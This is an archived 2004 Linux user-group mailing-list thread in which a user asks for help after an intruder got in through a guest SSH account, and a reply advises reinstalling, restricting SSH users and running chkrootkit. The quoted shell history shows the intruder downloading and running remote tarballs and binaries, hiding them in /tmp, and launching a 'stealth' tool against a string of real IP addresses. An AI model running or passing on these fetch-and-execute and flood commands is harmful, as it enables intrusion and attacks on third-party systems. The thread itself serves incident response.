Re: [SLUG] Someone in my computer

From: Ed Centanni (ecentan1@tampabay.rr.com)
Date: Tue Aug 24 2004 - 19:12:27 EDT


Once you wipe out the system and re-install fresh (highly recommended to
remove any potential traces of rooting) you may want to add a line in
/etc/sshd_config something like this:

AllowUsers user1 user2

where user1 and user2 are the users you ONLY want to allow access to
ssh. Make sure these users have good passwords or better still set up
public/private keys for automated authentication.

See man sshd and man ssh for details.

Also get chkrootkit http://www.chkrootkit.org and run it periodically.

Ed.

Tevfik Yucek wrote:

> Hi all,
>
>
> Last night I realize there was someone in my computer, Slackware 10.
> I have a sshd running and he/she/it is connected to my computer and
> executed the following commands.
>
> I am usually not concerned with security and did not care about much
> until yesterday. I had a guest "user" account with password "guest"
> and he/she/it used it.
>
> So, here are my questions:
> - how he/she/it knows about my IP and how did the know I was
> using linux and how did he/she/it got the password? Just guessing?
> - how can I kick a user if I notice that I have and uninvited
> visitor. I had to stop the internet connection of my computer.
> - what does the command below do and should I do something about
> them ?
>
>
> Thanks,
> Tevfik
>
> Here are the commmands:
>
> passwd
> cat /etc/issue
> cd /tmp
> mdkri .src
> cd .src
> mkdir .src
> cd .src
> wget carmelo.go.ro/do.tgz
> tar zxvf do.tgz
> rm -rf do.tgz
> ./do
> ./do
> wget 0kas.com/prt.tgz
> tar zxvf prt.tgz
> ./x
> ./x
> ./x
> ./x
> ./x
> ./x
> wget stefang.com/prostii/n
> chmod +x n
> ./n
> ./n
> ./n
> ./n
> ./n
> ./n
> ./n
> ./n
> ./n
> ./n
> ls
> ./n
> ./x
> ./x
> ./x
> wget yahaa.at/p/90
> ./90
> chmod +x 90
> ./90
> ./90
> wget 0kas.com/Florin/flood.tar.gz
> tar zxvf flood.tar.gz
> rm -rf flood.tar.gz
> ls
> rm -rf prt.tgz
> ls
> rm -rf prt.tgz
> cd belea
> ./stealth 218.38.3.83 53
> cd /tmp/.src/belea
> ./stealth 80.97.245.241 53
>
>
> ./stealth
> ^[[A
>
> w
> cd /tmp/.src
> cd belea
> ./steath 82.208.160.155 53
> ./steath 82.208.160.155 53
> ./steath 82.208.160.155 53
> ./stealth 82.208.160.155 53
> ./stealth 82.208.160.155 53
> export PATH="."
> bash
> cd /tmp/.src/belea
> w
> w
> cat psybnc.conf
> locate psybnc.conf
> ./stealth 213.154.149.199 53
> w
> ./stealth 213.233.97.53 53
> ./stealth 194.105.27.21 80
> ./stealth 81.196.147.218 53
> ./stealth 81.196.59.83 80
> ./stealth 81.196.59.83 53
> cd /tmp/.src
> cd belea
> ./stealth 80.96.146.171 53
> cd /tmp/ .scr/belea
> ./stealth 81.196.147.170 53
> ./stealth 81.196.147.170 55
> ./stealth 81.196.147.170 53
> ./stealth 211.47.141.43 53
> cd .src
> ce belea
> cd belea
> ./stealth 211.47.141.43
> ./stealth 211.47.141.43 53
> ./stealth 211.47.141.43 53
> w
> -----------------------------------------------------------------------
> This list is provided as an unmoderated internet service by Networked
> Knowledge Systems (NKS). Views and opinions expressed in messages
> posted are those of the author and do not necessarily reflect the
> official policy or position of NKS or any of its employees.
>
>

-----------------------------------------------------------------------
This list is provided as an unmoderated internet service by Networked
Knowledge Systems (NKS). Views and opinions expressed in messages
posted are those of the author and do not necessarily reflect the
official policy or position of NKS or any of its employees.



This archive was generated by hypermail 2.1.3 : Fri Aug 01 2014 - 15:18:37 EDT